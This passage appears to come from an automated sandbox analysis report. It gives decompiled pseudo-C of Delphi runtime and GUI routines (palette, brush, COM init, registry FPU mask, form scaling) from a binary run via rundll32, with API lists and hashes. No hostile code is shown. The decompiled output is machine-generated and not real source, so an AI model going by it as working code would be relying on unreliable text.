                          • CreateCompatibleDC.GDI32(00000000), ref: 027F8FED
                          • SelectObject.GDI32(00000000,00000000), ref: 027F8FF6
                          • GetDIBColorTable.GDI32(00000000,00000000,00000100,?,00000000,00000000,00000000,00000000,?,?,027FCC8B,?,?,?,?,027FB78B), ref: 027F900A
                          • SelectObject.GDI32(00000000,00000000), ref: 027F9016
                          • DeleteDC.GDI32(00000000), ref: 027F901C
                          • CreatePalette.GDI32 ref: 027F9062
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: CreateObjectSelect$ColorCompatibleDeletePaletteTable
                          • String ID:
                          • API String ID: 2515223848-0
                          • Opcode ID: 28f14418b4d4236feb8a30c2cef6a9edbf3e3df895f3b389eb017c49fc133ce8
                          • Instruction ID: dc90d9602cb6afe316ac9df21e1c8fedbbd7807ed2aa32d5f87c3302f8313f29
                          • Opcode Fuzzy Hash: 28f14418b4d4236feb8a30c2cef6a9edbf3e3df895f3b389eb017c49fc133ce8
                          • Instruction Fuzzy Hash: 5801F161208311B2E261B739AC0AF6B72FE8FC0750F01C81DB78887381EB79C8448762
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E027F86B8(void* __eax) {
                          				void* _t36;
                          
                          				_t36 = __eax;
                          				UnrealizeObject(E027F7CD8( *((intOrPtr*)(__eax + 0x14))));
                          				SelectObject( *(_t36 + 4), E027F7CD8( *((intOrPtr*)(_t36 + 0x14))));
                          				if(E027F7DB8( *((intOrPtr*)(_t36 + 0x14))) != 0) {
                          					SetBkColor( *(_t36 + 4),  !(E027F7018(E027F7C9C( *((intOrPtr*)(_t36 + 0x14))))));
                          					return SetBkMode( *(_t36 + 4), 1);
                          				} else {
                          					SetBkColor( *(_t36 + 4), E027F7018(E027F7C9C( *((intOrPtr*)(_t36 + 0x14)))));
                          					return SetBkMode( *(_t36 + 4), 2);
                          				}
                          			}





                          APIs
                            • Part of subcall function 027F7CD8: CreateBrushIndirect.GDI32(?), ref: 027F7D82
                          • UnrealizeObject.GDI32(00000000), ref: 027F86C4
                          • SelectObject.GDI32(?,00000000), ref: 027F86D6
                          • SetBkColor.GDI32(?,00000000), ref: 027F86F9
                          • SetBkMode.GDI32(?,00000002), ref: 027F8704
                          • SetBkColor.GDI32(?,00000000), ref: 027F871F
                          • SetBkMode.GDI32(?,00000001), ref: 027F872A
                            • Part of subcall function 027F7018: GetSysColor.USER32(?), ref: 027F7022
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                          • String ID:
                          • API String ID: 3527656728-0
                          • Opcode ID: 6cd9974d2dea045e97866566062b6760bb0b00fb878ad759991c05fae6e6750c
                          • Instruction ID: ad61d16dbe5fb09cdb4c831c11b34cebdc83d4b177b8bb9c68f892388adc69f6
                          • Opcode Fuzzy Hash: 6cd9974d2dea045e97866566062b6760bb0b00fb878ad759991c05fae6e6750c
                          • Instruction Fuzzy Hash: 76F07D65605100ABDF99FFB8EEC9D1B6BAE5F04311B444454BA04DF246DA65D8108F31
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E027D6139(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
                          				long _t11;
                          				void* _t16;
                          
                          				_t16 = __ebx;
                          				 *__edi =  *__edi + __ecx;
                          				 *((intOrPtr*)(__eax - 0x28655bc)) =  *((intOrPtr*)(__eax - 0x28655bc)) + __eax - 0x28655bc;
                          				 *0x2863008 = 2;
                          				 *0x2865014 = 0x27d12bc;
                          				 *0x2865018 = 0x27d12c4;
                          				 *0x286504e = 2;
                          				 *0x2865000 = E027D4F54;
                          				if(E027D304C() != 0) {
                          					_t3 = E027D307C();
                          				}
                          				E027D3140(_t3);
                          				 *0x2865054 = 0xd7b0;
                          				 *0x2865220 = 0xd7b0;
                          				 *0x28653ec = 0xd7b0;
                          				 *0x2865040 = GetCommandLineA();
                          				 *0x286503c = E027D13CC();
                          				if((GetVersion() & 0x80000000) == 0x80000000) {
                          					 *0x28655c0 = E027D6070(GetThreadLocale(), _t16, __eflags);
                          				} else {
                          					if((GetVersion() & 0x000000ff) <= 4) {
                          						 *0x28655c0 = E027D6070(GetThreadLocale(), _t16, __eflags);
                          					} else {
                          						 *0x28655c0 = 3;
                          					}
                          				}
                          				_t11 = GetCurrentThreadId();
                          				 *0x2865034 = _t11;
                          				return _t11;
                          			}






                          APIs
                            • Part of subcall function 027D304C: GetKeyboardType.USER32(00000000), ref: 027D3051
                            • Part of subcall function 027D304C: GetKeyboardType.USER32(00000001), ref: 027D305D
                          • GetCommandLineA.KERNEL32 ref: 027D619F
                          • GetVersion.KERNEL32 ref: 027D61B3
                          • GetVersion.KERNEL32 ref: 027D61C4
                          • GetCurrentThreadId.KERNEL32 ref: 027D6200
                            • Part of subcall function 027D307C: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 027D309E
                            • Part of subcall function 027D307C: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,027D30ED,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 027D30D1
                            • Part of subcall function 027D307C: RegCloseKey.ADVAPI32(?,027D30F4,00000000,?,00000004,00000000,027D30ED,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 027D30E7
                          • GetThreadLocale.KERNEL32 ref: 027D61E0
                            • Part of subcall function 027D6070: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,027D60D6), ref: 027D6096
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                          • String ID:
                          • API String ID: 3734044017-0
                          • Opcode ID: eb4abc3db195543121c43a6fc0863662160db97db39d7a5c23249775cc6bb4d1
                          • Instruction ID: 08023a92a5043ff2935be76b16582baf6e43f18f39c0fdc0688dd9294c547c7d
                          • Opcode Fuzzy Hash: eb4abc3db195543121c43a6fc0863662160db97db39d7a5c23249775cc6bb4d1
                          • Instruction Fuzzy Hash: 8801EDACC94342DAEB12BF64F51C3593AB6AB11304FC4695AC1948A6D2EB3D8124CF97
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 95%
                          			E027FD844(intOrPtr* __eax, void* __edx) {
                          				intOrPtr* _v8;
                          				struct HPALETTE__* _v12;
                          				char _v13;
                          				intOrPtr _v25;
                          				intOrPtr _v29;
                          				intOrPtr _v33;
                          				intOrPtr _v57;
                          				short _v59;
                          				short _v61;
                          				intOrPtr _v65;
                          				intOrPtr _v69;
                          				intOrPtr _v73;
                          				intOrPtr _v77;
                          				intOrPtr _v89;
                          				intOrPtr _v93;
                          				void _v97;
                          				void* _t44;
                          				void* _t46;
                          				intOrPtr _t49;
                          				void* _t54;
                          				struct HPALETTE__* _t56;
                          				void* _t72;
                          				void* _t74;
                          				void* _t75;
                          				struct HDC__* _t76;
                          				intOrPtr _t97;
                          				void* _t107;
                          				void* _t109;
                          				void* _t110;
                          				intOrPtr _t112;
                          
                          				_t107 = _t109;
                          				_t110 = _t109 + 0xffffffa0;
                          				_t72 = __edx;
                          				_v8 = __eax;
                          				_t44 = E027FC980(_v8);
                          				if(_t72 == _t44) {
                          					L16:
                          					return _t44;
                          				} else {
                          					_t46 = _t72 - 1;
                          					if(_t46 < 0) {
                          						_t44 =  *((intOrPtr*)( *_v8 + 0x6c))();
                          						goto L16;
                          					} else {
                          						if(_t46 == 7) {
                          							_t49 =  *0x286440c; // 0x27f5374
                          							_t44 = E027F87AC(_t49);
                          							goto L16;
                          						} else {
                          							E027D2C20( &_v97, 0x54);
                          							_t54 = memcpy( &_v97,  *((intOrPtr*)(_v8 + 0x28)) + 0x18, 6 << 2);
                          							_t112 = _t110 + 0xc;
                          							_v13 = 0;
                          							_v77 = 0;
                          							_v73 = 0x28;
                          							_v69 = _v93;
                          							_v65 = _v89;
                          							_v61 = 1;
                          							_v59 =  *0x028638A7 & 0x000000ff;
                          							_v12 =  *((intOrPtr*)(_t54 + 0x10));
                          							_t74 = _t72 - 2;
                          							if(_t74 == 0) {
                          								_t56 =  *0x28658c8; // 0x570809f5
                          								_v12 = _t56;
                          							} else {
                          								_t75 = _t74 - 1;
                          								if(_t75 == 0) {
                          									_t76 = E027F88E4(GetDC(0));
                          									_v12 = CreateHalftonePalette(_t76);
                          									_v13 = 1;
                          									ReleaseDC(0, _t76);
                          								} else {
                          									if(_t75 == 2) {
                          										_v57 = 3;
                          										_v33 = 0xf800;
                          										_v29 = 0x7e0;
                          										_v25 = 0x1f;
                          									}
                          								}
                          							}
                          							 *[fs:eax] = _t112;
                          							 *((char*)(_v8 + 0x22)) = E027FC460( *((intOrPtr*)( *_v8 + 0x64))( *[fs:eax], 0x27fd991, _t107),  &_v97) & 0xffffff00 | _v12 != 0x00000000;
                          							_pop(_t97);
                          							 *[fs:eax] = _t97;
                          							_push(0x27fd998);
                          							if(_v13 != 0) {
                          								return DeleteObject(_v12);
                          							}
                          							return 0;
                          						}
                          					}
                          				}
                          			}


































                          APIs
                          • GetDC.USER32(00000000), ref: 027FD901
                          • CreateHalftonePalette.GDI32(00000000,00000000), ref: 027FD90E
                          • ReleaseDC.USER32(00000000,00000000), ref: 027FD91D
                          • DeleteObject.GDI32(00000000), ref: 027FD98B
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: CreateDeleteHalftoneObjectPaletteRelease
                          • String ID: (
                          • API String ID: 577518360-3887548279
                          • Opcode ID: 913ed78100d0f66f600c79762bbbff4a264d317a962631ba28e9c22610010930
                          • Instruction ID: 2e06097874ae62d57708d157c22bb8bd2b72872fa0b86a0a100b49cf6d797ef2
                          • Opcode Fuzzy Hash: 913ed78100d0f66f600c79762bbbff4a264d317a962631ba28e9c22610010930
                          • Instruction Fuzzy Hash: C441BF70A08208DFDB65DFE8C449BDEBBF6EF89304F0080A5E908A7395D7759A05DB81
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 75%
                          			E02809CC4(char __edx, void* __edi, void* __fp0) {
                          				char _v5;
                          				void* __ecx;
                          				void* __ebp;
                          				intOrPtr* _t14;
                          				intOrPtr _t24;
                          				char _t28;
                          				intOrPtr* _t29;
                          				intOrPtr* _t35;
                          				char _t40;
                          				void* _t45;
                          				intOrPtr _t47;
                          				struct HINSTANCE__* _t48;
                          				void* _t49;
                          				void* _t50;
                          				void* _t57;
                          
                          				_t57 = __fp0;
                          				_t45 = __edi;
                          				_t40 = __edx;
                          				if(__edx != 0) {
                          					_t50 = _t50 + 0xfffffff0;
                          					_t14 = E027D3570(_t14, _t49);
                          				}
                          				_v5 = _t40;
                          				_t35 = _t14;
                          				E02809004(0x200);
                          				E0280D6B4(0, _t45, _t57);
                          				 *((intOrPtr*)(_t35 + 0x278)) = E02813638(0x280a164, _t35);
                          				E0280A83C(_t35, 1);
                          				 *((intOrPtr*)( *_t35 + 0x10c))();
                          				_t24 =  *((intOrPtr*)(_t35 + 0x23c));
                          				 *((intOrPtr*)(_t24 + 0x10)) = _t35;
                          				 *((intOrPtr*)(_t35 + 0x28c)) =  *((intOrPtr*)(_t24 + 0x14));
                          				_t47 = E027D31DC(1);
                          				 *((intOrPtr*)(_t35 + 0x27c)) = _t47;
                          				 *((intOrPtr*)(_t47 + 0xc)) = _t35;
                          				 *((intOrPtr*)(_t47 + 8)) = 0x2809fc0;
                          				 *((char*)(_t35 + 0x289)) = 0;
                          				_t28 =  *0x2809dcc; // 0x2
                          				 *((char*)(_t35 + 0x26c)) = _t28;
                          				if( *0x2865b2c == 0) {
                          					 *0x2865b2c = 1;
                          					_t48 = GetModuleHandleA("ole32.dll");
                          					if(_t48 != 0) {
                          						 *0x2865b28 = GetProcAddress(_t48, "CoInitializeEx");
                          					}
                          				}
                          				if( *0x2865b28 == 0) {
                          					_push(0);
                          					L027E81A8();
                          				} else {
                          					 *0x2865b28(0, 2);
                          				}
                          				_t29 = _t35;
                          				if(_v5 != 0) {
                          					E027D35C8(_t29);
                          					_pop( *[fs:0x0]);
                          				}
                          				return _t35;
                          			}

                          APIs
                          • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02809D74
                          • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02809D85
                          • CoInitialize.OLE32(00000000), ref: 02809DA6
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: AddressHandleInitializeModuleProc
                          • String ID: CoInitializeEx$ole32.dll
                          • API String ID: 3965314501-4163290989
                          • Opcode ID: 01c9261e790b904b3502d7cdb6869cbfaf8cdfc156619c0724471ad48799f437
                          • Instruction ID: f3bf643149394488cd340843c588d76647d32d6bcb084a9a54530c3e3891b77b
                          • Opcode Fuzzy Hash: 01c9261e790b904b3502d7cdb6869cbfaf8cdfc156619c0724471ad48799f437
                          • Instruction Fuzzy Hash: B721BFBCA853409FE781AF289CC97557BA59B09718F4844B8EC09DB3C3CA75A8448F62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 65%
                          			E027D307C() {
                          				void* _v8;
                          				char _v12;
                          				int _v16;
                          				signed short _t12;
                          				signed short _t14;
                          				intOrPtr _t27;
                          				void* _t29;
                          				void* _t31;
                          				intOrPtr _t32;
                          
                          				_t29 = _t31;
                          				_t32 = _t31 + 0xfffffff4;
                          				_v12 =  *0x2863020 & 0x0000ffff;
                          				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
                          					_t12 =  *0x2863020; // 0x27f
                          					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
                          					 *0x2863020 = _t14;
                          					return _t14;
                          				} else {
                          					_push(_t29);
                          					_push(E027D30ED);
                          					_push( *[fs:eax]);
                          					 *[fs:eax] = _t32;
                          					_v16 = 4;
                          					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
                          					_pop(_t27);
                          					 *[fs:eax] = _t27;
                          					_push(0x27d30f4);
                          					return RegCloseKey(_v8);
                          				}
                          			}

                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 027D309E
                          • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,027D30ED,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 027D30D1
                          • RegCloseKey.ADVAPI32(?,027D30F4,00000000,?,00000004,00000000,027D30ED,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 027D30E7
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: CloseOpenQueryValue
                          • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                          • API String ID: 3677997916-4173385793
                          • Opcode ID: 1b9f25a083137ef7f8a21cb9c4c832e583f4693488cdd85b897c92e220087ac9
                          • Instruction ID: 01f9de5334f721981840f4b199f5332e8d4cca9611e82ec21144ea9a1c77d2f0
                          • Opcode Fuzzy Hash: 1b9f25a083137ef7f8a21cb9c4c832e583f4693488cdd85b897c92e220087ac9
                          • Instruction Fuzzy Hash: 8A01D4B9E44309BAFB11EB94DC46FE9BBBCEB08B00F5005E1FA04E2980E6755910CB56
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 67%
                          			E027E4158(signed short* __eax, signed int __ecx, signed short* __edx, void* __edi, void* __fp0) {
                          				signed short* _v8;
                          				signed int _v12;
                          				char _v13;
                          				signed int _v16;
                          				signed int _v18;
                          				void* _v24;
                          				void* _v28;
                          				signed int _v44;
                          				void* __ebp;
                          				signed short _t136;
                          				signed short* _t256;
                          				intOrPtr _t307;
                          				intOrPtr _t310;
                          				intOrPtr _t318;
                          				intOrPtr _t325;
                          				intOrPtr _t333;
                          				signed int _t338;
                          				void* _t346;
                          				void* _t348;
                          				intOrPtr _t349;
                          
                          				_t353 = __fp0;
                          				_t346 = _t348;
                          				_t349 = _t348 + 0xffffffd8;
                          				_v12 = __ecx;
                          				_v8 = __edx;
                          				_t256 = __eax;
                          				_v13 = 1;
                          				_t338 =  *((intOrPtr*)(__eax));
                          				if((_t338 & 0x00000fff) >= 0x10f) {
                          					_t136 =  *_v8;
                          					if(_t136 != 0) {
                          						if(_t136 != 1) {
                          							if(E027E6434(_t338,  &_v24) != 0) {
                          								_push( &_v18);
                          								if( *((intOrPtr*)( *_v24 + 8))() == 0) {
                          									_t341 =  *_v8;
                          									if(( *_v8 & 0x00000fff) >= 0x10f) {
                          										if(E027E6434(_t341,  &_v28) != 0) {
                          											_push( &_v16);
                          											if( *((intOrPtr*)( *_v28 + 4))() == 0) {
                          												E027DED9C(0xb);
                          												goto L46;
                          											} else {
                          												if( *_t256 == _v16) {
                          													_v13 =  *((intOrPtr*)(0x2863474 + _v12 * 2 + ( *((intOrPtr*)( *_v28 + 0x34))(_v12) & 0x0000007f) - 0x1c));
                          													goto L46;
                          												} else {
                          													_push( &_v44);
                          													L027DDCD4();
                          													_push(_t346);
                          													_push(0x27e4539);
                          													_push( *[fs:eax]);
                          													 *[fs:eax] = _t349;
                          													_t268 = _v16 & 0x0000ffff;
                          													E027DFDA4( &_v44, _v16 & 0x0000ffff, _t256, __edi, __fp0);
                          													if(_v44 != _v16) {
                          														E027DECAC(_t268);
                          													}
                          													_v13 =  *((intOrPtr*)(0x2863474 + _v12 * 2 + ( *((intOrPtr*)( *_v28 + 0x34))(_v12) & 0x0000007f) - 0x1c));
                          													_pop(_t307);
                          													 *[fs:eax] = _t307;
                          													_push(0x27e456c);
                          													return E027DF538( &_v44);
                          												}
                          											}
                          										} else {
                          											E027DED9C(0xb);
                          											goto L46;
                          										}
                          									} else {
                          										_push( &_v44);
                          										L027DDCD4();
                          										_push(_t346);
                          										_push(0x27e4483);
                          										_push( *[fs:eax]);
                          										 *[fs:eax] = _t349;
                          										_t273 =  *_v8 & 0x0000ffff;
                          										E027DFDA4( &_v44,  *_v8 & 0x0000ffff, _t256, __edi, __fp0);
                          										if( *_v8 != _v44) {
                          											E027DECAC(_t273);
                          										}
                          										_v13 = E027E3FCC( &_v44, _v12, _v8, _t353);
                          										_pop(_t310);
                          										 *[fs:eax] = _t310;
                          										_push(0x27e456c);
                          										return E027DF538( &_v44);
                          									}
                          								} else {
                          									if( *_v8 == _v18) {
                          										_v13 =  *((intOrPtr*)(0x2863474 + _v12 * 2 + ( *((intOrPtr*)( *_v24 + 0x34))(_v12) & 0x0000007f) - 0x1c));
                          										goto L46;
                          									} else {
                          										_push( &_v44);
                          										L027DDCD4();
                          										_push(_t346);
                          										_push(0x27e43e1);
                          										_push( *[fs:eax]);
                          										 *[fs:eax] = _t349;
                          										_t278 = _v18 & 0x0000ffff;
                          										E027DFDA4( &_v44, _v18 & 0x0000ffff, _v8, __edi, __fp0);
                          										if(_v44 != _v18) {
                          											E027DECAC(_t278);
                          										}
                          										_v13 =  *((intOrPtr*)(0x2863474 + _v12 * 2 + ( *((intOrPtr*)( *_v24 + 0x34))(_v12) & 0x0000007f) - 0x1c));
                          										_pop(_t318);
                          										 *[fs:eax] = _t318;
                          										_push(0x27e456c);
                          										return E027DF538( &_v44);
                          									}
                          								}
                          							} else {
                          								E027DED9C(__ecx);
                          								goto L46;
                          							}
                          						} else {
                          							_v13 = E027E3DAC(_v12, 2);
                          							goto L46;
                          						}
                          					} else {
                          						_v13 = E027E3D98(0, 1);
                          						goto L46;
                          					}
                          				} else {
                          					if(_t338 != 0) {
                          						if(_t338 != 1) {
                          							if(E027E6434( *_v8,  &_v28) != 0) {
                          								_push( &_v16);
                          								if( *((intOrPtr*)( *_v28 + 4))() == 0) {
                          									_push( &_v44);
                          									L027DDCD4();
                          									_push(_t346);
                          									_push(0x27e42f1);
                          									_push( *[fs:eax]);
                          									 *[fs:eax] = _t349;
                          									_t284 =  *_t256 & 0x0000ffff;
                          									E027DFDA4( &_v44,  *_t256 & 0x0000ffff, _v8, __edi, __fp0);
                          									if((_v44 & 0x00000fff) !=  *_t256) {
                          										E027DECAC(_t284);
                          									}
                          									_v13 = E027E3FCC(_t256, _v12,  &_v44, _t353);
                          									_pop(_t325);
                          									 *[fs:eax] = _t325;
                          									_push(0x27e456c);
                          									return E027DF538( &_v44);
                          								} else {
                          									if( *_t256 == _v16) {
                          										_v13 =  *((intOrPtr*)(0x2863474 + _v12 * 2 + ( *((intOrPtr*)( *_v28 + 0x34))(_v12) & 0x0000007f) - 0x1c));
                          										goto L46;
                          									} else {
                          										_push( &_v44);
                          										L027DDCD4();
                          										_push(_t346);
                          										_push(0x27e4263);
                          										_push( *[fs:eax]);
                          										 *[fs:eax] = _t349;
                          										_t289 = _v16 & 0x0000ffff;
                          										E027DFDA4( &_v44, _v16 & 0x0000ffff, _t256, __edi, __fp0);
                          										if((_v44 & 0x00000fff) != _v16) {
                          											E027DECAC(_t289);
                          										}
                          										_v13 =  *((intOrPtr*)(0x2863474 + _v12 * 2 + ( *((intOrPtr*)( *_v28 + 0x34))(_v12) & 0x0000007f) - 0x1c));
                          										_pop(_t333);
                          										 *[fs:eax] = _t333;
                          										_push(0x27e456c);
                          										return E027DF538( &_v44);
                          									}
                          								}
                          							} else {
                          								E027DED9C(__ecx);
                          								goto L46;
                          							}
                          						} else {
                          							_v13 = E027E3DAC(_v12, 0);
                          							goto L46;
                          						}
                          					} else {
                          						_v13 = E027E3D98(1, 0);
                          						L46:
                          						return _v13;
                          					}
                          				}
                          			}

                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 41ff81b90a6dbc3eb3cf913938c468f38d92ce9c34f1d26e51492ce6dc0d4be6
                          • Instruction ID: 67f5aed747de419ec5dfefdde0213f02249c1858a83cd184ac359d28a96d034e
                          • Opcode Fuzzy Hash: 41ff81b90a6dbc3eb3cf913938c468f38d92ce9c34f1d26e51492ce6dc0d4be6
                          • Instruction Fuzzy Hash: DCD17C39A00249AFCF12EFA4C4909EDBBBAEF4D710F5444A5E842A7711D730AA46CF75
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 89%
                          			E028159C4(intOrPtr __eax, intOrPtr __edx, void* __edi, void* __eflags) {
                          				intOrPtr _v8;
                          				intOrPtr _v12;
                          				int _v16;
                          				char _v17;
                          				signed char _t114;
                          				intOrPtr _t119;
                          				intOrPtr _t120;
                          				intOrPtr _t139;
                          				intOrPtr _t143;
                          				intOrPtr _t182;
                          				void* _t191;
                          				signed char _t205;
                          				intOrPtr _t207;
                          				intOrPtr _t219;
                          				void* _t224;
                          				void* _t226;
                          
                          				_t226 = __eflags;
                          				_t223 = _t224;
                          				_v12 = __edx;
                          				_v8 = __eax;
                          				E02830814(_v8);
                          				_push(_t224);
                          				_push(0x2815c47);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t224 + 0xfffffff0;
                          				 *(_v8 + 0x268) = 0;
                          				 *(_v8 + 0x26c) = 0;
                          				 *(_v8 + 0x270) = 0;
                          				_v17 = 0;
                          				_t114 =  *0x2865665; // 0x0
                          				 *(_v8 + 0x234) = _t114 ^ 0x00000001;
                          				E0282FF70(_v8, _t191, _v12, _t226);
                          				if( *(_v8 + 0x25c) == 0 ||  *(_v8 + 0x270) <= 0) {
                          					L12:
                          					_t119 = _v8;
                          					_t235 =  *((intOrPtr*)(_t119 + 0x268));
                          					if( *((intOrPtr*)(_t119 + 0x268)) > 0) {
                          						E0282D16C(_v8,  *(_v8 + 0x268), _t235);
                          					}
                          					_t120 = _v8;
                          					_t236 =  *((intOrPtr*)(_t120 + 0x26c));
                          					if( *((intOrPtr*)(_t120 + 0x26c)) > 0) {
                          						E0282D1B0(_v8,  *(_v8 + 0x26c), _t236);
                          					}
                          					_t205 =  *0x2815c54; // 0x0
                          					 *(_v8 + 0x98) = _t205;
                          					_t237 = _v17;
                          					if(_v17 == 0) {
                          						E02814E5C(_v8, 1, 1);
                          						E02833A40(_v8, 1, 1, _t237);
                          					}
                          					E0282E93C(_v8, 0, 0xb03d, 0);
                          					_pop(_t207);
                          					 *[fs:eax] = _t207;
                          					_push(0x2815c4e);
                          					return E0283081C(_v8);
                          				} else {
                          					if(( *(_v8 + 0x98) & 0x00000010) != 0) {
                          						_t219 =  *0x2865b5c; // 0x41d1150
                          						_t25 = _t219 + 0x40; // 0x60
                          						if( *(_v8 + 0x25c) !=  *_t25) {
                          							_t182 =  *0x2865b5c; // 0x41d1150
                          							_t28 = _t182 + 0x40; // 0x60
                          							E027F76C0( *((intOrPtr*)(_v8 + 0x68)), MulDiv(E027F76B8( *((intOrPtr*)(_v8 + 0x68))),  *_t28,  *(_v8 + 0x25c)), __edi, _t223);
                          						}
                          					}
                          					_t139 =  *0x2865b5c; // 0x41d1150
                          					_t33 = _t139 + 0x40; // 0x60
                          					 *(_v8 + 0x25c) =  *_t33;
                          					_v16 = E02815DB8(_v8);
                          					_t143 = _v8;
                          					_t231 =  *((intOrPtr*)(_t143 + 0x270)) - _v16;
                          					if( *((intOrPtr*)(_t143 + 0x270)) != _v16) {
                          						_v17 = 1;
                          						E02814E5C(_v8,  *(_v8 + 0x270), _v16);
                          						E02833A40(_v8,  *(_v8 + 0x270), _v16, _t231);
                          						if(( *(_v8 + 0x98) & 0x00000004) != 0) {
                          							 *(_v8 + 0x268) = MulDiv( *(_v8 + 0x268), _v16,  *(_v8 + 0x270));
                          						}
                          						if(( *(_v8 + 0x98) & 0x00000008) != 0) {
                          							 *(_v8 + 0x26c) = MulDiv( *(_v8 + 0x26c), _v16,  *(_v8 + 0x270));
                          						}
                          						if(( *(_v8 + 0x98) & 0x00000020) != 0) {
                          							 *(_v8 + 0x1fa) = MulDiv( *(_v8 + 0x1fa), _v16,  *(_v8 + 0x270));
                          							 *(_v8 + 0x1fe) = MulDiv( *(_v8 + 0x1fe), _v16,  *(_v8 + 0x270));
                          						}
                          					}
                          					goto L12;
                          				}
                          			}

                          APIs
